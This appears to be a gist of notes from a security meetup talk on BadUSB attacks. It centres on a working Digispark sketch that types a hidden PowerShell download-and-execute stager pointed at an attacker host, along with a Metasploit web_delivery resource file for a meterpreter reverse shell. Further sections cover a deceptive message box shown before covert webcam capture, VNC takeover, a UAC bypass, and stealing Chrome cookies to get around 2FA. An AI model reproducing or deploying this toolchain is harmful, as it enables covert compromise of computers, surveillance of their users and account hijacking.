Notes from the Null talk on BadUSB
## Bad USB code (Digispark sketch using the DigiKeyboard library; it types a PowerShell stager into the Run dialog)
#include "DigiKeyboard.h" | |
#define WorkingPin 1 // Just as an LED indicator, as to when the work is finished | |
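// One-time board initialisation.
// WorkingPin is driven with digitalWrite() in loop(), so it has to be
// configured as an output here; the original sketch left setup() empty,
// which leaves the pin in its default (input) mode.
void setup() {
  pinMode(WorkingPin, OUTPUT);
}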
// Types the payload exactly once and then parks the MCU forever.
// Sequence: LED on, null keystroke, Win+R, PowerShell one-liner, Enter, LED off.
void loop() {
  digitalWrite(WorkingPin, HIGH);

  // DigiKeyboard's own examples send a null keystroke first; reportedly this
  // stops some hosts from dropping the first real character after a delay.
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);

  // Win+R opens the Run dialog. The fixed 500 ms wait is an assumption about
  // the target: a slow or busy host may not have focus yet and will lose text.
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);

  // Stager line, typed verbatim into the Run box.
  // - 192.168.1.2:8080 and /nFUICYVjGMT6a must be the URL web_delivery prints
  //   when it starts (its URIPATH is random unless pinned in the .rc file);
  //   reflash the board whenever that URL changes.
  // - GetSystemWebProxy() + DefaultCredentials reuse the system proxy and the
  //   logged-on user's credentials, presumably so the download also works
  //   behind an authenticating proxy.
  // - -w hidden only hides the PowerShell window; the Run dialog is still
  //   visible on screen while the text is typed.
  DigiKeyboard.print("powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);

  digitalWrite(WorkingPin, LOW);

  // Spin forever so the sequence is never replayed while the device stays plugged in.
  while (true) {
  }
}
## Metasploit resource file used in the demonstration: `msf-web-delivery.rc` (load it with `msfconsole -r msf-web-delivery.rc`)
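use exploit/multi/script/web_delivery
# Target 2 is the PSH (PowerShell) target, which matches the one-liner the
# Digispark sketch types.
set Target 2
set LHOST <YOUR_LOCAL_IP_HERE>
set LPORT 6680
# Pin the stager URL so it matches the one hard-coded in the sketch
# (http://<ip>:8080/nFUICYVjGMT6a). Without these two lines web_delivery
# picks a random URIPATH on every run and the flashed board points at a
# URL that no longer exists.
set SRVPORT 8080
set URIPATH nFUICYVjGMT6a
set payload windows/x64/meterpreter/reverse_tcp
# Migrate as soon as the session opens: the stager runs inside a short-lived
# powershell.exe and the session dies with it otherwise.
# Keep this comment on its own line: msfconsole's `set` takes everything after
# the option name as the value, so a trailing "# ..." on the set line would be
# stored as part of the AutoRunScript value.
set AutoRunScript post/windows/manage/migrate
exploit -j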
## Popping up an innocuous message box before starting to capture webcam snaps (Railgun call from a meterpreter `irb` shell)
DEFCON 20: Weaponizing the Windows API with Metasploit : https://youtu.be/bdUT20fwwfI?t=1527 | |
railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) # 0x10 is for MB_ICONSTOP, taken from here : https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-messagebox | |
Inside the meterpreter `irb` shell the session object is exposed as `client`, so if the bare call above fails, prefix it with `client.` (as shown in the video):
client.railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) | |
## For VNC
After getting a meterpreter session: `run vnc`
The VNC server is tunnelled back through the meterpreter session, so the viewer is pointed at the attacker ("local") machine, not at the target; the script normally launches `vncviewer` itself, otherwise connect to the local port it prints.
## For privilege escalation via UAC bypass ( https://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/ ) - note this only lifts a medium-integrity session of a user who is already a local Administrator to high integrity; it does not help for a standard user
# UAC bypass (COM handler hijack). Precondition: the session's user is already a
# local Administrator running at medium integrity; the module rejects anything
# else. Result: a new high-integrity session on LHOST:LPORT (LPORT left at its
# default so it does not collide with the 6680 handler from the .rc file).
use exploit/windows/local/bypassuac_comhijack
set payload windows/x64/meterpreter/reverse_tcp
# The id from `sessions -l` of the session obtained through the BadUSB stager.
set SESSION 2
set LHOST <YOUR_LOCAL_IP_HERE>
run
## For extracting Google Chrome cookies: stolen cookies reuse an already-authenticated browser session, whereas stolen passwords would still require the OTP if 2FA is enabled
https://mango.pdf.zone/stealing-chrome-cookies-without-a-password | |
The discussion here is worth reading too: https://news.ycombinator.com/item?id=18376323
There is a Metasploit module for it as well: https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md (as described in its docs it drives Chrome through its remote-debugging interface rather than decrypting the cookie database, so expect it to spawn a Chrome process on the target - noisy on a monitored host)
## State of the art things | |
Bad USB cables : https://mg.lol/blog/badusb-cables/ | |
O.M.G. cables : https://mg.lol/blog/omg-cable/ | |
## Other Useful Things | |
DigiSpark Scripts Repo : https://github.com/CedArctic/DigiSpark-Scripts | |
#shamelessSelfPromotion Ahead :p | |
You can read my other blogs here : https://lud1161.github.io/ | |
and | |
Here : https://lud1161.wordpress.com/ |
Hello @vishwaskheriwal, sorry to break out to you but the talk wasn't recorded and I am not getting time enough to make a tutorial for the same and put it up online. |
Hello @vishwaskheriwal |
Sir can you provide a video on this topic.